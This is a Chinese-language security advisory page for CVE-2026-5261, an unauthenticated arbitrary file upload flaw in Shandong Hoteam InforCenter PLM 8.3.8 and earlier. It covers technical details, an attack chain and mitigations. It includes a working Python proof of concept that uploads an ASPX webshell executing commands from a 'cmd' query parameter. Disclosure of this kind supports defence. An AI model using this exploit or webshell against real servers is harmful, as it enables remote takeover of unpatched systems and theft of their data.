CVE-2026-5261 CVSS 7.3 高危

CVE-2026-5261 山东华天PLM任意文件上传漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5261

漏洞类型

任意文件上传

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Shandong Hoteam InforCenter PLM

漏洞概述

山东华天InforCenter PLM系统中存在严重的安全漏洞，影响版本至8.3.8及之前。该漏洞位于/Base/BaseHandler.ashx文件的uploadFileToIIS函数中，由于未对用户输入的File参数进行严格过滤，导致未经身份验证的攻击者可远程上传任意文件。攻击者利用此漏洞可上传Webshell，进而控制服务器，造成数据泄露或系统破坏。厂商已收到通知但尚未回应。

技术细节

漏洞产生于Shandong Hoteam InforCenter PLM的/Base/BaseHandler.ashx接口，具体涉及uploadFileToIIS处理逻辑。该函数在处理文件上传请求时，仅依赖客户端传入的File参数，缺乏服务端的有效验证机制，如文件扩展名黑/白名单检查、Content-Type验证或文件内容特征码检测。攻击者可通过构造特制的HTTP POST请求，将恶意脚本（如.aspx）伪装或直接作为File参数内容发送。由于系统未对上传文件进行重命名或隔离存储，攻击者可预测上传路径并直接访问该文件，导致在服务器上下文中执行任意系统命令，完全危及系统安全。

攻击链分析

STEP 1

侦查

攻击者识别出目标服务器运行Shandong Hoteam InforCenter PLM系统，并确定版本低于8.3.8。

STEP 2

漏洞利用

攻击者构造恶意HTTP POST请求，向/Base/BaseHandler.ashx的uploadFileToIIS接口发送包含Webshell代码的文件。

STEP 3

文件上传

由于系统未进行严格校验，恶意文件被成功上传至服务器Web目录。

STEP 4

执行代码

攻击者通过浏览器访问上传的脚本文件，在服务器端执行任意命令，获取系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://target-ip/Base/BaseHandler.ashx"
shell_filename = "shell.aspx"

# Malicious payload (ASPX Webshell)
payload = '''
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e)
{
    Process.Start(Request.QueryString["cmd"]);
}
</script>
'''

# Construct multipart form data
files = {
    'File': (shell_filename, payload, 'application/octet-stream')
}

try:
    # Send exploitation request
    response = requests.post(target_url, files=files, timeout=10)
    
    if response.status_code == 200:
        print("[+] File upload possibly successful.")
        print("[+] Check access at: http://target-ip/Base/" + shell_filename)
    else:
        print("[-] Upload failed. Status code:", response.status_code)
except Exception as e:
    print("[-] Error occurred:", str(e))

影响范围

Shandong Hoteam InforCenter PLM <= 8.3.8

防御指南

临时缓解措施

由于厂商尚未提供补丁，建议立即在网络防火墙或WAF上封锁对/Base/BaseHandler.ashx路径的外部访问。同时，检查服务器Web目录中是否存在异常的可执行文件，并限制IIS用户对上传目录的写入权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5261
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5261
3 Details https://www.cvedetails.com/cve/CVE-2026-5261/
4 VulDB https://vuldb.com/cve/CVE-2026-5261
5 Link https://my.feishu.cn/docx/ToGkdd5jwokb4PxEMkHcKrfXn3b?from=from_copylink
6 Link https://vuldb.com/submit/780725
7 Link https://vuldb.com/vuln/354450
8 Link https://vuldb.com/vuln/354450/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表